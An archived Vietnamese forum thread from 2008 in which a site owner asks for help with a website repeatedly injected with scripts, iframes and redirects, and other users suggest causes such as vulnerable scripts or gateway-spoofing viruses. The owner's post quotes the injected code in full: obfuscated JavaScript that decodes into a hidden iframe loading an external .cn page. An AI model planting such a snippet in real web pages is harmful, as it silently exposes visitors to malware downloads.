PDA

View Full Version : Phòng trị web liên tục bị chèn script, iframe, redirect,?



vuatintac
16-11-2008, 20:50
Hi các pro.

Website của mình là Proskills.vn.
Tình hình là trước đó nhân sự củ liên hệ hosting ở mình đâu không biết.
gần đây web liên tục bị "tấn công". Lúc thì "ai đó", chèn vào các đoạn mã javascript (đã được mã hóa). vấn đề là đoạn mã này có vẻ được dò và chèn tự động vào file index.php (và một số file khác), lúc chạy web, nó gọi một iframe, và load cái gì đó (Gióng như là statistic).
link load có dạng: http://****.cn/****

Mình upload lại source. Set MOD, được vài bữa lại bị...

càng về sau, càng nặng hơn. lần kế cuối là nó redirect sang một trang gì đó, down một file PDF về, (kaspersky chặn lại, vì phát hiện ra đó là virus)

Hôm nay down lun website. mình upload lại, nhưng vẫn chưa hoạt động? Hình như lần này host bị lỗi hay sao ấy.

các pro có từng gặp vấn đề này, xin cho giúp em!

p/s: xin lỗi vì hai vấn đề khác nhau nên tạo topic mới!:emlaugh:

[=========> Bổ sung bài viết <=========]

Đoạn code chèn vào thế này


<script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>


:fear:

LinuXpert
17-11-2008, 01:21
Các bộ script trên website của bạn có vẻ có lỗ hổng nên từ ngoài có thể chạy các command để chèn thêm nội dung. Điều đầu tiên là bạn nên kiểm tra xem các script đó có version mới chưa và cập nhật ngay. Sau đó nhờ HP kiểm tra lại server xem việc chèn thêm nội dung có phải thông qua local hack hay không?

BillClinton
17-11-2008, 05:44
Có 2 khả năng:

1. Server của bạn bị nhiễm virus, nó sửa các file bạn nói -> diệt virus là hết

2. Máy tính nào đó cùng mạng với server của bạn bị nhiễm loại virus giả Gateway. Con virus này chèn vào nội dung trả về từ server của ban. Cách xử lý là phải tìm ra cái máy kia để diệt virus (bọn này có thể dùng Bkav để diệt)

hikhik
17-11-2008, 09:15
bạn thử nhờ bạn bè ở ngoài kiểm tra xem sao đã.
Nhìn cái kiểu link và cái scripts chèn vào thì nó gần như là dạng Virus giả dạng Gateway hơn là code của bạn bị nhiễm.

vuatintac
18-11-2008, 16:15
Cái này, lúc bị, bất kỳ máy nào vào cũng bị như thế,
Mình ở trung tâm hay về nhà cũng gióng vậy.
giờ thì OK rồi, ko biết có bị lại ko?

chienbinh12
19-11-2008, 15:00
Khổ thân bác
Em xin một bài